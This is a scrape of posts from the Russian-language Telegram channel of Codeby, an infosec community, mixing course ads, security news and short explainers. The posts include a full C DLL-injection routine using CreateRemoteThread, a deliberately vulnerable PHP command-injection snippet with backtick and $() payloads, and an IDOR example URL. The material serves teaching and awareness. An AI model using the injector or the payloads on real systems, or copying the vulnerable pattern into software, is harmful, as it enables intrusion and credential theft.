codeby_sec | Unsorted

Telegram-канал codeby_sec - Codeby

34854

Крупнейшее ИБ сообщество ру-сегмента Чат: @codeby_one Форум: codeby.net Обучение: codeby.school Пентест: codeby.one CTF: codeby.games VK: vk.com/codeby YT: clck.ru/XG99c Сотрудничество: @KinWiz Номер заявления для регистрации канала в РКН: 5035340278

Subscribe to a channel

Codeby

⚡️ Новый курс "Устройства для тестирования на проникновение" стартует 12 августа. Изучите создание устройств для пентеста на практике!

Что вы получите после обучения?
🔸 Практические навыки работы с микроконтроллерами и микрокомпьютерами
🔸 Навыки сборки устройств для тестирования на проникновение
🔸 Актуальные знания по защитному функционалу

Курс создан для всех, кто хочет на практике изучить техники аудита систем ИБ и эксплуатации уязвимостей с помощью современных устройств.

🥇 Сертификат / удостоверение о повышении квалификации

Пишите нам: @Codeby_Academy 🚀

➡️ Узнать подробнее о курсе

Читать полностью…

Codeby

Что такое DLL-injection? 👩‍💻

⏺️DLL-инъекции часто используются внешними программами, чтобы повлиять на поведение другой программы так, как её авторы не задумывали и не предполагали.

⏺️Например, внедрённый код может перехватывать системные вызовы функций или прочитать содержимое текстовых полей пароля, что невозможно сделать обычным способом.

👩‍💻 На Windows имеется множество способов заставить процесс загрузить код в DLL-библиотеке:

DLL-файлы, указанные в списке системного реестра по ключу HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs, будут загружаться в каждом процессе, загружающем библиотеку User32.dll при её начальном вызове.

DLL-файлы по ключу HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDLLs будут загружаться в каждом процессе, которые вызывают функции Windows API CreateProcess, CreateProcessAsUser, CreateProcessWithLogonW, CreateProcessWithTokenW и WinExec.

Эксплуатация ограничений Windows и приложений, вызывающих LoadLibrary или LoadLibraryEx без указания пути к загружаемой DLL.


👩‍💻 Пример такого кода на языке C:
#include <windows.h>

HANDLE inject_DLL(const char* file_name, int PID)
{
HANDLE h_process, h_rThread;
char fullDLLPath[_MAX_PATH];
LPVOID DLLPath_addr, LoadLib_addr;
DWORD exit_code;

/* Извлечение handle-идентификатора целевого процесса */
h_process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);

/* Получение полного пути к DLL-файлу */
GetFullPathName(file_name, _MAX_PATH, fullDLLPath, NULL);

/* Выделение памяти в целевом процессе */
DLLPath_addr = VirtualAllocEx(h_process, NULL, _MAX_PATH,
MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

/* Запись пути к DLL-файлу в недавно созданный блок памяти */
WriteProcessMemory(h_process, DLLPath_addr, fullDLLPath,
strlen(fullDLLPath), NULL);

/* Получение адреса LoadLibraryA (такой же для всех процессов), чтобы начать его запуск */
LoadLib_addr = GetProcAddress(GetModuleHandle("Kernel32"), "LoadLibraryA");

/* Запуск удалённого потока в LoadLibraryA, и проброс пути к DLL в качестве аргумента */
h_rThread = CreateRemoteThread(h_process, NULL, 0,
(LPTHREAD_START_ROUTINE)LoadLib_addr, DLLPath_addr, 0, NULL);

/* Ожидание его завершения */
WaitForSingleObject(h_rThread, INFINITE);

/* Получение кода завершения (то есть, значение handle, возвращённый вызовом LoadLibraryA */
GetExitCodeThread(h_rThread, &exit_code);

/* Освобождение носителя внедрённого потока. */
CloseHandle(h_rThread);
/* А также память, выделенная для пути к DLL */
VirtualFreeEx(h_process, DLLPath_addr, 0, MEM_RELEASE);
/* А также handle-иднетификатор целевого процесса */
CloseHandle(h_process);

return (HANDLE)exit_code;
}

Читать полностью…

Codeby

😎 Напоминаем, на каких курсах начинается обучение в августе:

🌟 7 августа — «Введение в Реверс инжиниринг»
🌟 8 августа — «Основы Linux»
🌟 12 августа — «Устройства для тестирования на проникновение» — Первый поток!
🌟 26 августа — «Цифровая криминалистика и реагирование на инциденты ОС Linux (DFIR)»

✔️ Запись на «Боевой OSINT» открыта до 15 августа!
✔️ Скидка 5% на «Анализ защищенности инфраструктуры на основе технологий Active Directory» при записи до 23 августа!

🔔 Запишитесь у нашего менеджера @Codeby_Academy 🚀 или узнайте подробности на сайте!

Читать полностью…

Codeby

🐧 Обнаружена 0-day уязвимость в драйвере n_gsm

В ядре Linux выявлена 0-day уязвимость в драйвере n_gsm, позволяющая выполнить код на уровне ядра и получить привилегии в системе. Эксплоиты для этой уязвимости уже появились в открытом доступе, и проблема остается неисправленной.

⏺️ Драйвер n_gsm реализует протокол GSM 07.10 для GSM-модемов. Уязвимость связана с состоянием гонки в обработчике ioctl GSMIOC_SETCONF_DLCI, что приводит к обращению к памяти после её освобождения (use-after-free).

🌚 Эксплоит может быть использован на системах с ядрами Linux от версии 5.15 до 6.5. Чтобы предотвратить автоматическую загрузку уязвимого модуля, добавьте в файл /etc/modprobe.d/blacklist.conf строку «blacklist n_gsm».

Читать полностью…

Codeby

Привет, Кодебай! 😎

🔄 Мы продолжаем нашу серию статей о работе с наборами данных в CSV-файлах с помощью Python. В первой части мы уже разобрали нормализацию текстовых данных.

🕯 В этой статье мы создадим обработчик строк файла CSV, который будет использовать наши ранее написанные функции нормализации. Вы узнаете, как читать данные из файлов и сохранять обработанные данные обратно в файлы. Мы также рассмотрим, как обрабатывать большие объемы данных без исчерпания оперативной памяти.

➡️ Читать подробнее и улучшить свои навыки по обработке данных! 👩‍💻

➡️ Освоить Python и применять в задачах по пентесту! 🥇

#Python #CSV #ОбработкаДанных

Читать полностью…

Codeby

😎 Новая статья в блоге Академии — сегодня мы погрузимся в историю OSINT (Open Source Intelligence).

🔸Откуда все началось?
🔸Как OSINT применялся в различных мировых кейсах?
🔸Как вы можете использовать эти знания сегодня?

📣 Мы расскажем о ключевых моментах развития OSINT, поделимся примерами успешного использования этих технологий и расскажем как овладеть мастерством разведки вместе с нами. 🙂

➡️ Читать подробнее

А что вы знаете про OSINT? Делитесь интересными фактами и своими историями в комментариях! (лучшую историю опубликуем в канале)

Читать полностью…

Codeby

Как защитить свой бизнес от атак на цепочки поставок?

В новом выпуске подкаста «Безопасно говоря» обсудили, как предотвратить supply chain attack. Своим опытом риск-менеджмента поделились эксперты кибербеза Yandex Cloud Алексей Миртов и Рами Мулей, а также директора по ИБ из «Хоум Банка» и Московской биржи.

Полный выпуск по ссылке.

Читать полностью…

Codeby

🖥 SnailLoad: Как хакеры узнают ваши посещения сайтов

Атака SnailLoad разработана исследователями из Австрии. Эта атака позволяет хакерам узнать, какие сайты вы посещаете и какие видео смотрите на YouTube, анализируя задержки пакетов.

Как это работает

Для этой атаки не нужен MITM (Man-In-The-Middle). Всё, что требуется хакерам, это чтобы жертва открыла в браузере страницу, контролируемую атакующими. Эта страница загружает большие файлы или изображения с их сервера. Даже без JavaScript, непрерывный поток трафика позволяет провести атаку.

➡️ Хакеры анализируют задержки доставки пакетов. Эти задержки меняются из-за запросов, выполняемых пользователем к различным сайтам.

🛡 Как защититься, ваши идеи?

Добавляйте случайный шум в трафик.
Следите за фоновой сетевой активностью.
• Запускайте приложения с разным типом трафика.

Читать полностью…

Codeby

👩‍💻 Критическая уязвимость в GitLab

➡️ Недавно вышли обновления для GitLab: версии 17.1.2, 17.0.4 и 16.11.6. В них исправлены шесть уязвимостей, включая критическую (CVE-2024-6385).

🗣️ Эта уязвимость позволяет злоумышленнику запускать pipeline jobs от имени другого пользователя, получая доступ к внутренним репозиториям и закрытым проектам.


✔️ Для обновления выполните команды:

# For GitLab CE
sudo apt-get update
sudo apt-get install gitlab-ce=17.1.2-ce.0

# For GitLab EE
sudo apt-get update
sudo apt-get install gitlab-ee=17.1.2-ee.0

Читать полностью…

Codeby

⚡️ Освойте лучшие практики OSINT вместе с Академией Кодебай!

Курс "Боевой OSINT" создан для пентестеров и специалистов по бизнес-разведке.

🗓 Старт потока: 5 августа

Вы научитесь:
Обеспечивать свою безопасность при поиске (Counter-OSINT)
Находить информацию в СlearNet и DarkNet
Автоматизировать сбор аналитики
Находить информацию о юридических или физических лицах как в RU-сегменте, так и за его пределами

🚀 @Codeby_Academy

🔗 Узнать подробнее о курсе

Читать полностью…

Codeby

📱 Уязвимость EvilVideo в Telegram

➡️ Эксперты из ESET выявили уязвимость нулевого дня в Telegram для Android, названную EvilVideo.

Уязвимость: Позволяла злоумышленникам отправлять вредоносные APK-файлы, замаскированные под видео.
Эксплоит: Продавался хакером Ancryno с 6 июня 2024 года.
Затронутые версии: Telegram для Android 10.14.4 и старше.

🗣️ Пока неизвестно, использовалась ли уязвимость в реальных атаках. Однако, обнаружены связанные с ней вредоносные APK-файлы, маскирующиеся под Avast Antivirus или xHamster Premium Mod.

Читать полностью…

Codeby

🚩 Новые задания на платформе Codeby Games!

👩‍💻  Категория Active DirectoryПутешественник

🎢 Категория РазноеЗмеелов

🔎 Категория OSINTОкунемся в историю?

Приятного хакинга!

Читать полностью…

Codeby

🛡 Whonix 17.2: Анонимность и защита данных

➡️ Вышел Whonix 17.2 — дистрибутив на базе Debian GNU/Linux, использующий Tor для анонимности. Распространяется под GPLv3. Доступны образы для VirtualBox (2.1 ГБ с Xfce и 1.4 ГБ консольный) и KVM.

✔️ Проект защищает от утечки IP-адреса и данных. Не запускайте Whonix-Workstation и Whonix-Gateway на одном компьютере для предотвращения уязвимостей.

#новости

Читать полностью…

Codeby

Что такое CMD Injection (Command Injection)

👩‍💻 Command Injection - это одна из разновидностей внедрения кода. Её особенностью является выполнение несанкционированных команд операционной системы на удалённом сервере через уязвимое приложение.

👩‍💻 Пример уязвимого кода на языке PHP:

<?php
if (isset($_GET['filename'])) {
system("touch /codeby/" . $_GET['filename'] . ".cdb");
}
?>


Если мы используем специальные символы, то фильтрация входных данных будет нарушена.
`command`​
$(command)

Тем самым system выполнит нашу команду.

🖥 Пример payload'a:
`ls`
$(ls)

Читать полностью…

Codeby

🆕 Обновление на платформе Codeby Games!

Подписка Basic:


1. Доступ к райтапам

Вы получаете доступ к авторским подробным инструкциям по задачам после их решения. Это поможет вам лучше понять, как решать задания и улучшить свои навыки в области кибербезопасности.

2. VPN-конфигурации (изолированные серверы)
Доступ к изолированным VPN-серверам для выполнения заданий. Это обеспечивает более безопасное и стабильное соединение.

3. Доступ к заданиям, находящихся в архиве (retired)
Возможность проходить архивные задачи, которые были загружены на платформу более пяти месяцев назад, но теперь доступны только по подписке Basic.

Стоимость подписки символическая - 990р. Вы получаете не только доступ к новому функционалу и полезным материалам, но и окажете необходимую для нас поддержку.

Приятного хакинга!

➡️ https://codeby.games

Читать полностью…

Codeby

👥 Главный фактор уязвимости компаний — устаревшее ПО

Исследование Positive Technologies показало, что треть успешных кибератак связана с устаревшим ПО. С 2022 по 2023 год этот метод использовался для кражи данных у более чем 2700 компаний.

⏺️ Доля таких атак выросла с 18% в 2019 году до 32% в 2023 году. В мае 2023 года массовая атака на сайты .ru и .рф произошла из-за уязвимости в «1С-Битрикс», а телекоммуникационная компания Xfinity потеряла данные 36 миллионов клиентов.


🌚 В 2023 году основные методы атак включали уязвимости в общедоступных приложениях (почтовые и веб-серверы) и использование украденных учетных данных. Эксперты прогнозируют рост числа кибератак.

Читать полностью…

Codeby

📣 Хакеры захватили 35 000 доменов через DNS-атаку Sitting Ducks

Эксперты из Infoblox и Eclypsium предупреждают о DNS-атаке Sitting Ducks, которая угрожает более миллиону доменов ежедневно. Уже захвачены 35 000 доменов. Атака позволяет перехватить домен без доступа к аккаунту владельца у DNS-провайдера или регистратора.

🌚 Sitting Ducks использует конфигурационные проблемы у регистраторов и недостаточную проверку прав собственности у DNS-провайдеров. Впервые об этой уязвимости сообщил специалист Snap Мэтью Брайант в 2016 году, но она до сих пор остается актуальной и эффективной.

Читать полностью…

Codeby

⚠️ Учёные нашли способ красть данные через HDMI

Уругвайские исследователи разработали метод кражи конфиденциальной информации, используя ИИ и интерфейс HDMI.

➡️ Они смогли зафиксировать электромагнитные сигналы от кабеля HDMI, подключенного к компьютеру, и расшифровать их с помощью ИИ.

🗣️ Метод позволяет с точностью 70% выявлять пароли, которые вводит пользователь. Учёные сообщают, что хакеры уже использовали эту технику для шпионажа за правительственными организациями и частными компаниями.

Читать полностью…

Codeby

🚩 Новые задания на платформе Codeby Games!

🖼 Категория СтеганографияНейросеть

🏆  Категория КвестыСМС

🌍 Категория ВебФизический доступ

Приятного хакинга!

Читать полностью…

Codeby

👩‍💻 Chrome будет спрашивать, почему ты загружаешь подозрительный файл

Google изменила политику Chrome для работы с подозрительными файлами. Теперь браузер будет спрашивать, зачем ты скачиваешь потенциально опасный файл.

🗣️ Chrome использует Safe Browsing для защиты от угроз. Файлы проверяются в реальном времени, и загрузка останавливается, если обнаружена опасность. Также, последние версии Chrome показывают всплывающее меню при скачивании подозрительных файлов.

Читать полностью…

Codeby

🇫🇷 Франция столкнулась с 68 кибератаками с начала Олимпиады в Париже

С 26 июля, когда начались Олимпийские игры в Париже, Франция пережила 68 кибератак. Об этом сообщил премьер-министр Габриэль Атталь.

🗣️ Большинство атак были направлены на ресурсы олимпийских объектов. Все, кроме двух из них, были быстро обнаружены и предотвращены, отметил Атталь.

Читать полностью…

Codeby

Привет, Кодебай! 😎

Эта статья посвящена "ShotStars" - инструменту, который открывает новые горизонты в изучении GitHub. Этот скрипт позволяет вам увидеть, кто ставил звёзды на ваши проекты, даже когда они были убраны. И всё это без необходимости регистрации, авторизации или использования токенов GitHub! 🤫

🔍 Как это работает?
- "ShotStars" анализирует данные о звёздach в репозиториях, позволяя вам видеть, кто был заинтересован в вашем проекте
- Поддерживает работу с различными операционными системами, включая GNU/Linux, Windows и Android через Termux
- Предоставляет подробные отчёты в формате CLI и HTML, включая расчётные даты и временные интервалы
- Имеет встроенную поддержку имитации результатов для тестирования

💡 Особенности:
- Поддержка сессий и корректная остановка программы
- Приятные бонусы в виде прогресс-баров, таблиц и баннеров
- Работает с проектами до 6000 звёзд в час, учитывая лимиты GitHub API

Ограничения:
- Необходимость ручного обновления данных при превышении лимитов GitHub API
- Нельзя обнаруживать одних и тех же пользователей, которые поставили и сняли звёздy в промежуток времени между сканированиями

➡️ Читать подробнее

Читать полностью…

Codeby

💻 Где практиковаться этичному хакингу?

Codeby Games
предлагает тебе уникальную возможность отточить свои навыки пентеста, решая задачи, приближенные к боевым!

- Более 50 уязвимых машин на Windows и Linux
- Более 300 CTF заданий
- Регулярные обновления
- Самое отзывчивое комьюнити

Огромное количество практики в любой из областей информационной безопасности:

🌍 Web-эксплуатация
🔑 Криптография
🕵️‍♂️ Форензика
🔍 OSINT
🖼 Стеганография
🧰 PWN
⚙️ Реверс-инжиниринг
💻 Active Directory

Присоединяйся к Codeby Games и окунись в мир инфобеза уже сегодня!

➡️ https://codeby.games/

Приятного хакинга!

Читать полностью…

Codeby

💻 Indirector: Уязвимость в процессорах Intel

Исследователи из Калифорнийского университета в Сан-Диего выявили уязвимость Indirector в процессорах Intel Raptor Lake и Alder Lake. Этот метод позволяет атакующему изменять спекулятивное выполнение инструкций в других процессах.

➡️ Основные особенности атаки:

IBP (Буфер предсказания косвенных переходов): Предсказывает переходы, когда адрес неизвестен.
BTB (Буфер предсказания переходов): Хранит информацию о недавних переходах.

🗣️ Атакующий может искажать содержимое этих буферов, подставляя произвольные адреса переходов.

Читать полностью…

Codeby

Почему выбирают OpenConnect?

Во-первых, в отличие от OpenVPN, IPSec и WireGuard, OpenConnect выглядит как обычное HTTPS-подключение. Его трафик труднее заметить и заблокировать, что важно в средах с активным перехватом.

Во-вторых, OpenConnect работает на всех популярных платформах: Windows, Linux, macOS, Android, iOS. Защита от активного сканирования тоже в комплекте.

➡️ Сравним с MS SSTP: серверная часть OpenConnect под Linux более производительная. При отсутствии блокировок он может использовать DTLS поверх UDP для лучшей производительности. SoftEther тоже добавляет UDP, но DTLS — проверенный временем протокол, используемый, например, в WebRTC.


⚙️ Настройка OpenConnect на клиентах проста: нужно только указать URL сервера, имя пользователя и пароль. Поддержка LDAP, Radius и Active Directory для авторизации тоже есть.

Читать полностью…

Codeby

#вакансия

🚀 Проектная работа
💰 Сдельная оплата
📆 Свободный график

🚩 Специалист по созданию заданий для CTF Attack Defense по веб-безопасности

Обязанности:
— Разработка и создание сценариев для заданий по веб-безопасности в рамках CTF-соревнований формата Attack Defense.
— Подготовка и внедрение атакующих и защитных сценариев, моделирование различных уязвимостей и методов их эксплуатации.
— Тестирование и верификация разработанных сценариев, обеспечение их корректной работы.
— Разработка и поддержка чекеров для автоматической проверки выполнения заданий.
— Создание подробных инструкций и документации по заданию.

Требования:
— Опыт участия в CTF-соревнованиях, понимание формата Attack Defense.
— Глубокие знания о распространенных уязвимостях веб-приложений (OWASP Top 10) и способах их эксплуатации.
— Знание одного из языков программирования: Go (Golang), Python, PHP, Java.
— Опыт работы с инструментами для тестирования безопасности (Burp Suite, OWASP ZAP и др.).

➡️Писать @StPoV

Читать полностью…

Codeby

🔍 Что такое IDOR (Insecure Direct Object References)?

Данный вид уязвимости является следствием недостаточной проверки пользовательских данных. Суть ее заключается в том, что при выводе каких-либо конфиденциальных данных, например личных сообщений или учетных карточек клиентов, для доступа к объекту используется идентификатор, который передается в открытом виде в адресной строке браузера.

Пример такого запроса:

codeby.net/message_dialog.jsp?id=313

Благодаря тому что мы можем менять значение параметра id, мы можем видеть диалог между пользователями. 😮

📎 Такая «уязвимость» практиковалась в lightshot* — одни пользователи могли просматривать скриншоты других.

*программа для создания скриншотов

Читать полностью…

Codeby

☄️ Индийская криптобиржа WazirX подверглась взлому, похищено криптоактивов на сумму более $230 миллионов.

🗣️ Представители WazirX заявили, что атака произошла из-за несоответствия между данными в интерфейсе Liminal и реальным содержимым транзакции. Они считают, что пейлоад был подменен, чтобы злоумышленник получил контроль над кошельком.


🔗 По данным Lookchain, украдены:

5,43 млрд токенов SHIB
15 200 токенов Ethereum
20,5 млн токенов Matic
640 млрд токенов Pepe
5,79 млн USDT
135 млн токенов Gala

➡️ Хакеры пытаются конвертировать активы на Uniswap. Специалисты Elliptic считают, что злоумышленники могут быть связаны с Северной Кореей. Это второй по величине взлом в этом году после атаки на японскую биржу DMM Bitcoin.

#новости

Читать полностью…

Codeby

Готовы сразиться за кибербезопасность города N?

8-10 сентября в Казани — ТРЕТЬЯ ВСЕРОССИЙСКАЯ СТУДЕНЧЕСКАЯ КИБЕРБИТВА


Попробуй себя в роли настоящего хакера или киберзащитника!

Кибербитва — это всероссийское ИБ-соревнование, где команды из ведущих вузов могут испытать свои силы в условиях, максимально приближенных к реальности.
Команда красных будет реализовывать кибератаки на инфраструктуру, а синие — выявлять инциденты ИБ.

Требования к участникам:
🟠Студенты или аспиранты вузов
🟠Опыт в прошлых кибербитвах или CTF-соревнованиях
🟠Сложившиеся команды от 5 до 10 человек
🟠Интерес к ИТ и кибербезопасности

Собери команду единомышленников, регистрируйся на сайте кибербитвы и проходи экспертный отбор от ведущих специалистов России.

Задача Innostage — дать будущим ИБ-специалистам площадку, где они на практике могут испытать свои силы. Лучшие игроки кибербитвы получают шанс запомниться судьям и присоединиться к топовым ИБ-компаниям России.

Призовой фонд кибербитвы — 200 000 рублей.

Регистрация команд продлена до 02 августа. Количество мест ограничено, так что поторопитесь!

ПРИНЯТЬ УЧАСТИЕ

Читать полностью…

Codeby

🛡 Зловред под видом блокировщика рекламы

Новость от ESET: обнаружен зловред HotPage, замаскированный под блокировщик рекламы, активный с конца 2023 года.

🗣️ Этот софт загружает драйвер ядра, позволяющий злоумышленникам запускать код с привилегиями на Windows. Инсталлятор устанавливает драйвер и две библиотеки, перехватывающие сетевой трафик браузеров.


Возможности вируса:

Изменять содержимое страниц
Перенаправлять пользователя
Открывать новые вкладки по заданным критериям
Собирает и передает системную информацию на сервер, связанный с китайской компанией Hubei Dunwang Network Technology Co., Ltd.

Читать полностью…
Subscribe to a channel